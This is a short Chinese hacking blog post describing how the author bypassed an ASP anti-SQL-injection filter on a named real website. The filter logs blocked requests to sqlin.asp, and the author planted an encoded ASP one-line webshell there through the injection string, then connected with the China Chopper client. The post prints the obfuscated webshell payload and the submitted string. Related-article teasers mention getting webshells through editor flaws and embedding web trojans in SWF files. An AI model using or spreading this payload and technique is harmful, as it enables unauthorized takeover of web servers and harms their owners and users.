SQL通用防注入系统asp版漏洞今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。... 12-05-15
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。

既然做了记录,再查看了下它的记录文件

于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ansi->unicode)
提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀连接之,成功
+----------------------------------------+
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。还有,另外百度了下,发现半坑土农民曾经发现了类似的,但是,额,去他博客看时 , 瀑布汗
相关文章:
-
-
-
-
编辑器代码逃逸漏洞 by蚊虫原创几天 冰刀丢给我一个论坛 这几天无聊 随便看看 看看能不能拿到webshell... 09-09-29 …
-
-
swf 调用网马代码
swf 调用网马代码下午研究了一下swf调用网马,不懂swf呀,封装纯脚本类网马没有问题,封装溢出型网马就会有问题。索性还是直接调用iframe,这样一来就一...
[阅读全文]
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论